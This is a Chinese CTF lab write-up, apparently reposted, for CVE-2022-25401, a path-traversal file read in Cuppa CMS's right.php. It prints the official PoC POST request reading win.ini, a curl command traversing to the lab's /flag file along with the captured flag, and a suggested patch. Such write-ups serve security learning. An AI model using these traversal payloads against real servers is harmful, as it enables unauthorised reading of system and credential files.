春秋云境CVE-2022-25401任意文件读取漏洞
目录
一、题目
介绍:
Cuppa CMS v1.0 administrator/templates/default/html/windows/right.php文件存在任意文件读取漏洞
进入题目 是一个登录页面
sql和暴破都无解。
官方POC
cve漏洞介绍
官方给错了目录 没有administrator/ 找不到
官方poc
代码块:
-
POST /cuppa_cms/administrator/templates/default/html/windows/right.php HTTP/1.1
-
Host: 192.168.174.133
-
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
-
Content-Length: 272
-
Accept: */*
-
Accept-Language: zh-CN,zh;q=0.9
-
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
-
Origin: http://192.168.174.133
-
Referer: http://192.168.174.133/cuppa_cms/administrator/
-
X-Requested-With: XMLHttpRequest
-
Accept-Encoding: gzip
-
-
id=1&path=component%2Ftable_manager%2Fview%2Fcu_views&uniqueClass=window_right_246232&url=../../../../../../windows/win.ini
burp抓包改包:不过没成功:可能是目录问题。
二、curl访问flag文件
进入目录templates/default/html/windows/right.php
这里返回空白页是表示有这个文件的,如果不存在会返回404。
进入templates/default/html目录
windows目录下right.php
查看源码:
kali的curl请求访问根目录下的flag文件
curl是一种命令行工具,作用是发出网络请求,然后得到和提取数据,显示在"标准输出"(stdout)上面。 它支持多种协议 查看网页源码 直接在curl命令后加上网址,就可以看到网页源码。
curl -X POST "http://xxx.ichunqiu.com/templates/default/html/windows/right.php" -d "url=../../../../../../../../../../../../flag"
得到flag
flag{fa417734-dac9-4947-831f-67b3ed302120}
附:
漏洞修复建议
在 ‘/templates/default/html/windows/right.php’ 文件处,第53行建议添加以下代码:
-
$url = $_POST["url"];
-
if(strstr($url, "../") || strstr($url, "..\\")){
-
echo "Security attack!";
-
exit;
-
}
-
include realpath(DIR . '/../../../..')."/".$url;
这篇好文章是转载于:学新通技术网
- 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
- 本站站名: 学新通技术网
- 本文地址: /boutique/detail/tanhfiaieg
系列文章
更多
同类精品
更多
-
photoshop保存的图片太大微信发不了怎么办
PHP中文网 06-15 -
Android 11 保存文件到外部存储,并分享文件
Luke 10-12 -
《学习通》视频自动暂停处理方法
HelloWorld317 07-05 -
word里面弄一个表格后上面的标题会跑到下面怎么办
PHP中文网 06-20 -
photoshop扩展功能面板显示灰色怎么办
PHP中文网 06-14 -
微信公众号没有声音提示怎么办
PHP中文网 03-31 -
excel下划线不显示怎么办
PHP中文网 06-23 -
excel打印预览压线压字怎么办
PHP中文网 06-22 -
怎样阻止微信小程序自动打开
PHP中文网 06-13 -
TikTok加速器哪个好免费的TK加速器推荐
TK小达人 10-01